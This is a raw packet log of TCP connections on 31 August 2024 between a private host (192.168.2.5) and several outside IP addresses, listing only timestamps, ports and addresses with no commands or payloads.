Aug 31, 2024 15:44:19.884912014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.885660887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885672092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885683060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885735035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.885735035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.885821104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885837078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885848999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885858059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.885863066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885874987 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:19.885899067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.885909081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885920048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885930061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885930061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.885941982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885958910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.885960102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885972023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885983944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.885984898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.885998964 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.886027098 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.892744064 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:19.898502111 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.898514032 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.898530006 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.898574114 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.898574114 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.898641109 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.898650885 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:19.899024963 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:19.900751114 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.900763035 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.900774956 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.900835037 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.900835037 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.901300907 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.901346922 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.904320955 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.966701984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.966712952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.966722965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.966775894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.966801882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.966821909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.966830969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.966840982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.966850996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.966860056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.966860056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.966880083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.966902018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.968000889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.968010902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.968022108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.968044043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.968056917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.968065023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.968099117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.968110085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.968118906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.968130112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.968147039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.968170881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.969727993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969738960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969748974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969775915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.969795942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.969799042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969822884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969832897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969841957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969852924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969854116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.969862938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.969871044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.969892979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.969912052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.969935894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.970024109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.970035076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.970042944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.970060110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.970069885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.970071077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.970072031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.970096111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.970115900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.971757889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971770048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971780062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971806049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.971823931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971833944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.971836090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971848011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971858978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971868992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971870899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.971896887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.971924067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.971927881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971951962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971962929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971971035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.971973896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971987009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.971997976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972002983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972009897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972028017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972038031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972045898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972052097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972063065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972073078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972074986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972086906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972088099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972100973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972112894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972119093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972125053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972158909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972183943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972194910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972206116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972238064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972238064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972249985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972251892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972260952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972273111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972275019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972289085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972296000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972301960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972310066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972328901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972337961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972366095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972376108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972388029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972402096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972419977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972431898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972518921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972529888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972539902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972549915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.972569942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.972601891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975359917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975369930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975380898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975394964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975405931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975415945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975415945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975428104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975451946 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975470066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975552082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975563049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975577116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975585938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975590944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975600004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975641012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975683928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975718975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975730896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975739956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975761890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975774050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975837946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975898027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.975972891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975984097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.975995064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976005077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976015091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976015091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.976026058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976032972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.976037025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976047993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976058006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976062059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.976069927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976080894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976090908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976095915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.976103067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976104021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.976139069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.976646900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976660967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976671934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.976699114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.976711988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.977016926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977030039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977041006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977052927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977071047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.977087975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.977705002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977716923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977727890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977757931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.977781057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.977835894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977940083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.977952003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977965117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977974892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977984905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.977996111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.977996111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.978010893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.978012085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.978033066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.978039980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.978044033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.978056908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.978059053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.978069067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.978080988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.978086948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.978110075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.978128910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.997628927 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.997689009 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.997744083 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.997786045 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.997818947 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.997823954 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.997828960 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.997858047 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.997885942 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.998240948 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.998251915 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.998261929 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.998284101 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.998301029 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.998541117 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.998558044 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.998583078 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.998608112 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.045571089 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.045631886 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.045639992 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.045649052 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.045660019 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.045679092 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.045701027 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.048641920 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.048652887 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.048661947 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.048691034 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.048702002 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.058896065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.058907032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.058917046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.058955908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.058983088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.059350967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.059360981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.059370995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.059393883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.059407949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.059482098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.059613943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.060400963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.060410976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.060420990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.060466051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.060492039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.060867071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.060877085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.060885906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.060898066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.060909033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.060929060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.060956955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.061877012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061887026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061897039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061906099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061916113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061924934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061929941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061934948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061937094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.061944962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061953068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.061955929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.061988115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.062000990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.062045097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062055111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062058926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062067986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062091112 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.062112093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.062562943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062611103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.062716007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062805891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.062877893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062887907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062897921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062906981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062922955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.062932968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.062958002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.062967062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063026905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063038111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063047886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063059092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063067913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063080072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063091993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063119888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063184977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063196898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063205957 CEST	80	49727	52.212.52.84	192.168.2.5
